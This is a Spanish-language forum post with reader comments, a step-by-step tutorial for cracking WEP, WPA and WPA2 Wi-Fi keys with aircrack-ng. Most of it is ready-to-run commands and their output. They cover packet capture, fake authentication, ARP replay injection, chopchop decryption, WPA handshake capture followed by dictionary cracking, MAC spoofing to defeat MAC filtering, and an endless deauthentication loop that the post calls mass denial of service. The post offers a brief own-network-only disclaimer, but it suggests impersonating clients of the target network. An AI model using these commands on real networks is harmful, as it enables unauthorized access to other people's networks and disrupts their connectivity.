Obtener claves wifi, wep, wpa y wpa2

Antes de empezar, este post es una adaptación de gran cantidad de páginas que ha sido llevada cabo por mi mismo, por tanto es de mi originalidad, es un post bastante completo, si les parece complicado en taringa pueden encontrar otros más sencillos o pueden usar el GUI que les facilito abajo, para los que quieran algo más completo todavía, busquen la biblia de seguridad wireless. Y sobre todo comenten, siempre que puedan comenten.

Atentamente: thjthurj6kuke.

Este post no está pensado para cometer actos delictivos sino para probar la seguridad de nuestra propia red inalámbrica, bueno empecemos:
Para conseguir esto necesitamos el siguiente programa, aircrack-ng, también hay una versión para windows y con interfaz gráfica (winairodump), pero el proceso aquí explicado será desde un linux de la familia Debian, también hay un GUI en versión beta que vale para las claves WEP.
El programa aircrack-ng es una suite que está compuesta por los siguientes programas:

1- airodump-ng: programa para la captura de paquetes 802.11
2- aireplay-ng: programa para la inyección de paquetes 802.11
3- aircrack-ng: recuperador de claves estáticas WEP y WPA-PSK
4- airdecap-ng: desencripta archivos de capturas WEP/WPA
5- airmon-ng: activa y desactiva el modo monitor


Previamente debemos de mirar si nuestra tarjeta wireless es compatible con el modo monitor en nuestro sistema operativo, hay muchas paginas para ello.

Empecemos lo primero es instalar el programa, lo haremos con:

sudo apt-get install aircrack-ng

También se puede hacer con aptitude

sudo aptitude install aircrack-ng

Lo siguiente es usar en una terminal:

iwconfig

Y nos saldrá algo parecido a esto:

IEEE 802.11bg ESSID:"XXXXX_XX"
Mode: Managed Frequency:2.462 GHz Access Point: XX:XX:XX:XX:XX:XX
Bit Rate=54 Mb/s Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:off
Link Quality=65/70 Signal level=-45 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Como vemos en la segunda linea pone Mode:Managed, lo que debemos de hacer es pasar la tarjeta a modo monitor, lo haremos con el siguiente comando tras registrarse como root (sudo -s):

airmon-ng stop wlan0

airmon-ng start wlan0


Obtener claves wifi, wep, wpa y wpa2Ubuntu[/URL]

Se puede hacer con cualquier interfaz de red pero la más común es la wlan0, en cualquier caso solo debemos cambiar donde dice wlan0 por la interfaz de red que usaremos. En este caso nos dirá algo como:
wlan0Xxxxxxxxxxx - [phy0]
(monitor mode enabled on mon0)

Ahora pasaremos a monitorizar el trafico de red, lo haremos con:

airodump-ng mon0

contraseñaInteresante[/URL]

Nota: Todas las operaciones se harán como root. Mon0 es el nombre de la interfaz de red wlan0 en modo monitor.

También podemos bloquear mon0 en un canal fijo para facilitar ciertas operaciones, lo haremos añadiendo -c y el número del canal que vamos a bloquear al final, detrás de mon0 (van del 1 al 14, 1-11 América, 1-13 Europa y 1-14 Japón). Ej:

airodump-ng mon0 -c 6

Nota: -c (canal)

airodump-ng mostrará una lista con los puntos de acceso detectados, y también una lista de clientes conectados o estaciones ("stations".
 
BSSID PWR Beacons # Data CH MB ENC ESSID

00:13:10:30:24:9C 46 15 3416 6 54. WEP the ssid
00:09:5B:1F:44:10 36 54 0 11 11 OPN NETGEAR

BSSID STATION PWR Packets Probes

00:13:10:30:24:9C 00:09:5B:EB:C5:2B 48 719 the ssid
00:13:10:30:24:9C 00:02:2D:C1:5D:1F 190 17 the ssid

BSSID
Dirección MAC del punto de acceso.
PWR
Nivel de señal reportado por la tarjeta. Su significado depende del controlador, pero conforme te acercas al punto de acceso o a la estación la señal aumenta. Si PWR == -1, el controlador no soporta reportar el nivel de señal.
 
Beacons
Número de paquetes-anuncio enviados por el AP. Cada punto de acceso envía unos diez beacons por segundo al ritmo (rate) mínimo (1M), por lo que normalmente pueden ser recogidos desde muy lejos.
 
# Data
Número de paquetes de datos capturados (si es WEP, sólo cuenta IVs), incluyendo paquetes de datos de difusión general.
 
CH
Número de canal (obtenido de los paquetes beacon). Nota: algunas veces se capturan paquetes de datos de otros canales aunque no se esté alternando entre canales debido a las interferencias de radiofrecuencia.
 
MB
Velocidad máxima soportada por el AP. Si MB = 11, entonces se trata de 802.11b, si MB = 22 entonces es 802.11b+ y velocidades mayores son 802.11g.
 
ENC
Algoritmo de encriptación en uso. OPN = sin encriptación, "WEP?" = WEP o mayor (no hay suficiente datos para distinguir entre WEP y WPA), WEP (sin la interrogación) indica WEP estática o dinámica, y WPA si TKIP o CCMP están presentes.
 
ESSID
Conocida como "SSID", puede estar vacía si el ocultamiento de SSID está activo. En este caso airodump-ng tratará de recuperar el SSID de las respuestas a escaneos y las peticiones de asociación.
 
STATION
Dirección MAC de cada estación asociada. En la captura de más arriba se han detectado dos clientes (00:09:5B:EB:C5:2B y 00:02:2D:C1:5D:1F).
Nota: Podemos encontrar algunas variaciones según las versiones, pero lo fundamental siempre es lo mismo, que son los datos que hemos definido.
Lo siguiente será capturar tráfico de la red seleccionada, lo haremos con:

airodump-ng -c (número del canal) --bssid (número, se explica arriba) -w (nombre del archivo de captura) mon0

Ej: airodump-ng -c 11 --bssid 00:00:00:00:00:00 -w caza mon0

debianclaves[/URL]

Conseguirwep[/URL]

Nota: Nunca cerrar la terminal anterior en la que monitorizamos el tráfico, todos los procesos en los que en la terminal ya no se pueda escribir se continuarán en otra terminal sin cerrar la primera.

Ahora nos dividimos, se siguen dos procesos distintos el primero que explicaremos es el de las claves wep:

Ahrora lo que debemos de hacer es una falsa autentificación, con ella podremos reinyectar tráfico y acelerar el proceso, para ello usaremos el siguiente comando:

aireplay-ng -1 0 -e (essid) -a (bssid) -h (dirección MAC que vamos a asociar) mon0

Nota: -1 es el número en clave del ataque de aireplay-ng y el 0 significa ataques infinitos, cualquier otro número indicaría el límite de intentos. Se explicarán con más detalles más abajo.

Ej: aireplay-ng -1 0 -e wlan_50 -a XX:XX:XX:XX:XX:XX -h 11:22:33:44:55:66 mon0

La dirección MAC de arriba es inventada pero también vale para el programa, se puede utilizar la real aunque no se recomienda, o la de alguien que este conectado a la red en cuestión.

Tras estar durante unos segundos mandando autentificaciones:

Sending Authentication Request (Open System) [ACK]

Nos saldrá algo así como:

Attack was unsuccessful. Possible reasons:

* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.


El penúltimo paso el dar la orden de reinyectar el tráfico automaticamente, lo haremos con:
aireplay-ng -3 -b (bssid del router) -h 11:22:33:44:55:66 mon0

Ej: aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h 11:22:33:44:55:66 mon0

Ahora solo queda esperar a que descifre la contraseña capturando tráfico, lo que haremos será abir otra terminal (no hace falta ser root) y escribir:

aircrack-ng *.cap (el * significa todos los archivos con extensión .cap, los que usa airodump-ng)

Nos saldrá una lista con las redes de las que hemos capturado tráfico y nos pedirá que seleccionemos una, tenemos que escribir el número que hay al lado izquierdo del nombre de la red (debajo de #), y pulsar enter (si solo hemos capturado de una probablemente no tendremos que escribir ningún número. Podemos dejar esta ultima abierta, cuando llegue al siguiente corte que indica (van de 5000 en 5000) recalculará la contraseña y ya solo queda esperar.

Tambien podemos hacer esto con la GUI de aicrack-ng, se encuentra con gran facilidad con nuestro buscador predeterminado.

Se descomprime el archivo en la carpeta personal o en el escritorio, si lo hacemos en la carpeta personal abrimos terminal y escribimos:

sudo su

Entramos dentro de la carpeta con:

cd aircrack

Y escribimos ./aircrack-GUI-Start.sh run

Nota: si pide permisos por que no se abre vamos a donde a la carpeta aircrack, entramos, pulsamos el botón derecho, propiedades, permisos, permitir ejecutar el archivo como un programa. Y lo mismo hacemos con el archivo de al lado. El programa es bastante intuitivo en su uso. Si lo tenemos descomprimido en el escritorio escribimos:

cd Escritorio (justo después de sudo su).

Claves WPA/WPA2

El metodo aquí es diferente, se trata de conseguir un handshake (apretón de manos) entre el router y un cliente que posea la contraseña.
Después de capturar tráfico debemos de esperar a que un cliente se asocie con el punto de acceso, si hay alguien conectado podemos acelerar el proceso con:

aireplay-ng -0 10 -a (bssid) -c (MAC del cliente a desautentificar).

Ej: aireplay-ng -0 10 -a 00:00:00:00:00:00 -c 11:22:33:44:55:66

taringaLinux[/URL]

Ahora solo queda esperar a que haga efecto, podemos repetir el proceso si hace falta, podemos mirar si hemos conseguido el handshake con:

aircrack-ng *.cap

Para descifrar la contraseña debemos usar un diccionario, podemos encontrar en muchas páginas de internet, recomiendo que los tengáis en la carpeta de usuario.
Para usar uno con una red usaremos:

aircrack-ng –w xxxx *.cap (sustituimos las xxxx por el nombre del diccionario incluyendo la extensión).

Y si la clave se encuentra en una de las lineas del diccionario el programa nos mostrará la contraseña.
Próximamente saldrá un programa para conseguir las claves WPA TKIP con bastante más facilidad (similar a las claves WEP) ya que el proceso del programa que hemos explicado es muy lento y requiere de mucha paciencia, hasta entonces este es uno de los mejores programas que existen para estos trabajos.

DATOS ADICIONALES:

Una de las formas de aumentar más la seguridad de un router wifi es activando el bloqueo de direcciones MAC, de esa forma solo el ordenador de sus propietarios puede conectarse, pero hay una forma de saltearlo en linux:
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55
ifconfig wlan0 up

Si no funciona, intenta sacar y re-insertar la tarjeta.
Muy interesante y efectivo el programa macchanger

Unir archivos de captura:
Puedes usar el programa mergecap (parte del paquete ethereal-common o la distribución win32):
mergecap -w out.cap test1.cap test2.cap test3.cap
Se puede unir archivos .ivs con el programa "mergeivs".

Los ataque de aireplay-ng:

Ataque 0: desautentificación
Este ataque es probablemente el más útil para recuperar un ESSID oculto (no difundido) y para capturar "saludos" WPA forzando a los clientes a reautentificarse. También puede ser usado para generar peticiones ARP en tanto que los clientes Windows a veces vacían su cache de ARP cuando son desconectados. Desde luego, este ataque es totalmente inservible si no hay clientes asociados.
Normalmente es más efectivo fijar como blanco una estación específica usando el parámetro -c.
Algunos ejemplos:
Captura del "saludo" WPA 
airmon-ng start wlan0
airodump-ng mon0 -w out -c 6  (cambia a otra consola)
aireplay-ng -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B mon0
(espera unos segundos)
aircrack-ng -w /ruta/al/diccionario out.cap
Generar peticiones ARP 
airmon-ng start wlan0
airodump-ng mon0 -w out -c 6  (cambia a otra consola)
aireplay-ng -0 10 -a 00:13:10:30:24:9C mon0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B mon0
Después de enviar tres tandas de paquetes de desautentificación, comenzamos a escuchar en busca de peticiones ARP con el ataque 3. La opción -h es esencial y debe ser la dirección MAC de un cliente asociado.
Denegación de servicio masiva 
airmon-ns start wlan0
aireplay-ng -0 0 -a 00:13:10:30:24:9C mon0
Con el parámetro 0, este ataque enviará en un bucle infinito paquetes de desautentificación a las direcciones de broadcast, evitando así que los clientes permanezcan conectados.
 
Ataque 1: autenticación falsa
Este ataque es particularmente útil cuando no hay clientes asociados: creamos la dirección MAC de un cliente falso, la cual quedará registrada en la tabla de asociación del AP. Esta dirección será usada para los ataques 3 (reinyección de peticiones ARP) y 4 (desencriptación WEP "chopchop". Es mejor preparar la tarjeta con la MAC usada (abajo, 00:11:22:33:44:55) de modo que el controlador envíe ACKs de forma adecuada.
De todos modos si este ataque falla y hay ya un cliente asociado, es más efectivo usar simplemente su dirección MAC (aquí, 00:09:5B:EB:C5:2B) para los ataques 3 y 4.
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55
ifconfig wlan0 up
// o bien macchanger -c 00:11:22:33:44:55 wlan0
aireplay-ng -1 0 -e "el ssid" -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 mon0
12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)
Algunos puntos de acceso requieren de reautentificación cada 30 segundos, si no nuestro cliente falso será considerado desconectado. En este caso utiliza el retardo de re-asociación periódica:
aireplay-ng -1 30 -e "el ssid" -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 mon0
Si este ataque parece fallar (aireplay-ng permanece enviando paquetes de petición de autenticación), puede que esté siendo usado un filtrado de direcciones MAC. Asegúrate también de que:
Estás lo suficientemente cerca del punto de acceso, pero ojo no demasiado porque también puede fallar.
El controlador está correctamente parcheado e instalado.
La tarjeta está configurada en el mismo canal que el AP.
El BSSID y el ESSID (opciones -a / -e) son correctos.
Si se trata de Prism2, asegúrate de que el firmware está actualizado.
 
Ataque 2: Reenvío interactivo de paquetes
Este ataque te permite elegir un paquete dado para reenviarlo; a veces proporciona resultados más efectivos que el ataque 3 (reinyección automática de ARP).
Podrías usarlo, por ejemplo, para intentar el ataque "redifundir cualesquiera datos", el cuál sólo funciona si el AP realmente reencripta los paquetes de datos WEP:
aireplay-ng -2 -b 00:13:10:30:24:9C -n 100 -p 0841
-h 00:09:5B:EB:C5:2B -c FFFFFFF mon0
También puedes usar el ataque 2 para reenviar manualmente paquetes de peticiones ARP encriptacas con WEP, cuyo tamaño es bien 68 o 86 bytes (dependiendo del sistema operativo):
aireplay-ng -2 -b 00:13:10:30:24:9C -d FFFFFFF
-m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B mon0

aireplay-ng -2 -b 00:13:10:30:24:9C -d FFFFFFF
-m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B mon0
Ataque 3: Reinyección de petición ARP
El clásico ataque de reinyección de petición ARP es el mas efectivo para generar nuevos IVs, y funciona de forma muy eficaz. Necesitas o bien la dirección MAC de un cliente asociado (00:09:5B:EB:C5:2B), o bien la de un cliente falso del ataque 1 (00:11:22:33:44:55). Puede que tengas que esperar un par de minutos, o incluso más, hasta que aparezca una petición ARP; este ataque fallará si no hay tráfico.
Por favor, fíjate en que también puedes reutilizar una petición ARP de una captura anterior usando el interruptor -r .
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 mon0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...
Ataque 4: El "chopchop" de KoreK (predicción de CRC)
Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la clave. Incluso puede funcionar con WEP dinámica. Este ataque no recupera la clave WEP en sí misma, sino que revela meramente el texto plano. De cualquier modo, la mayoría de los puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Este ataque necesita al menos un paquete de datos WEP.
 
Primero, desencriptemos un paquete:
aireplay-ng -4 -h 00:09:5B:EB:C5:2B mon0
Echemos un vistazo a la dirección IP:
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
Ahora, forjemos una petición ARP.
La IP inicial no importa (192.168.1.100), pero la Ip de destino (192.168.1.2) debe responder a peticiones ARP. La dirección MAC inicial debe corresponder a una estación asociada.
./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C
00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
Y reenviemos nuestra petición ARP forjada:
aireplay-ng -2 -r arp.cap mon0

Recuerdo, no se olviden de comentar

Quizá te interesen algunos de mis otros post:

Como acelerar linux

http://www.taringa.net/posts/linux/13969088/Como-acelerar-linux.html

Navegar como anónimo ubuntu

http://www.taringa.net/posts/linux/14193410/Navegar-como-anonimo-ubuntu.html

Instalar LOIC en ubuntu y debian

http://www.taringa.net/posts/linux/14244259/Instalar-LOIC-en-ubuntu-y-debian.html

Comandos de linux para principiantes

http://www.taringa.net/posts/linux/14261179/Comandos-de-linux-para-principiantes.html

Comentarios Destacados

@sweetmaldita +5
Este post me ha ayudado mas que otros xq aqui entendi mas osea es mas profundo desde mi punto de vista y me gusto mas xq entendi mejor aqui y el que lo denuncie y lo elimine es un envidioso... te dejara puntos nene pero hace dias me eliminaron un post y no puedo puntear x los momentos pero muy pronto te los dare

19 comentarios - Obtener claves wifi, wep, wpa y wpa2

@aguselec -47
Bien leistes el protocolo y sacastes los links ! Gracias !
@ydcaza +3
LEISTES ???? LEISTE !!!!
@herbert136
@ydcaza Jajajajajajajajaja
@sweetmaldita +5
Este post me ha ayudado mas que otros xq aqui entendi mas osea es mas profundo desde mi punto de vista y me gusto mas xq entendi mejor aqui y el que lo denuncie y lo elimine es un envidioso... te dejara puntos nene pero hace dias me eliminaron un post y no puedo puntear x los momentos pero muy pronto te los dare
@tameron +3
los ataques por diccionario pueden llevar años igual te dejo 10 me gusto esta muy bien exlpicado
@Artur_1984 +2
Bastante complicado pero es ir a lo seguro. Es parecido al post de Droncho-otro crack!
@AlexisAparicioCh
oye podrias pasarme el link de algun diccionario??
me quedo en este paso:
aircrack-ng –w xxxx *.cap
@AlexisAparicioCh
AlexisAparicioCh dijo:oye podrias pasarme el link de algun diccionario??
me quedo en este paso:
aircrack-ng –w xxxx *.cap


descargue un diccionario de 13gb pero no se que comando debo usar para que lo utilice :S

aircrack-ng –w xxxx *.cap y buscando lei que debo especificar la ruta de mi diccionario
como quedaria entonces???
aircrack-ng –w (mi diccionario esta en: Escritorio/Debug/wordlists/dic.lst)
me podrias facilitar esa linea para que abra el diccionario para que empiece a buscar la clave??
@leontao +1
no entendi un carajo pero lo guardare para estudiarlo luego comenzare por algo mas sencillo gracias
@hittmanx +1
aguselec dijo:Bien leistes el protocolo y sacastes los links ! Gracias !



LeisteSSS sacastesSS y tu leiste el protocolo para escribir bien en T?
@Sephiroth_77
Bastante útil, gracias por compartirlo!!!
@GillespieBelmont
aguselec dijo:Bien leistes el protocolo y sacastes los links ! Gracias !


Me parece que necesitas un protocolo de ortografía

Ej: aireplay-ng -1 0 -e wlan_50 -a XX:XX:XX:XX:XX:XX -h 11:22:33:44:55:66 mon0
La dirección MAC de arriba es inventada pero también vale para el programa, se puede utilizar la real aunque no se recomienda, o la de alguien que este conectado a la red en cuestión.


La MAC inventada es 11:22:33:44:55:66? No entendí eso

Podrías explicarme como usar maccchanger con un ejemplo, por favor!
@trikini +1
aguselec dijo:Disculpa pero este tema no cumple con el protocolo de taringa.net http://www.taringa.net/protocolo/ ya que no lo cumple devere denunciar este tema y despues sera ELIMINADO Por favor lee el protocolo de taringa

http://www.taringa.net/protocolo/


Se puede ser tan pelotudo!!!!



aguselec dijo:Bien leistes el protocolo y sacastes los links ! Gracias !


Se escribe leiste (sin ese final), en vez de andar denunciando lee un diccionario.
@tudjenradio +1
Cheee gracias porfin alguien se toma la molestia de explicarlo bien, yo recien entro en este tema y la verdad que me vino barbaro esto =D
@tudjenradio +1
+10 de una. Estoy reuniendo material y este es el mejor muy bien explicado.
@thjthurj6kuke
Gracias, fue mi primer post en Taringa y puse todo mi empeño en que esuviera completo y para todos los públicos, lástima que me borraron imágenes que tenía y las perdí puede que termine volviendo a hacer capturas de pantalla
@sesshomaruzhack
te deje +10 .. seria mejor explicado con imagenes.. aun no probe nada xD
@thjthurj6kuke
Al principio tenía imágenes, pero se fueron, y como he intentado resubirlas peros iempre me las terminan tirando lo dejé ya así XD
Gracias por comentar.
@esfera0
Escribir un comentario...
@Thebasketbolista +1
No leí Ni Verga, solo quería aprender Rápido, pero después qué vi las Lineas, Números ETC. ME Aburrí. XD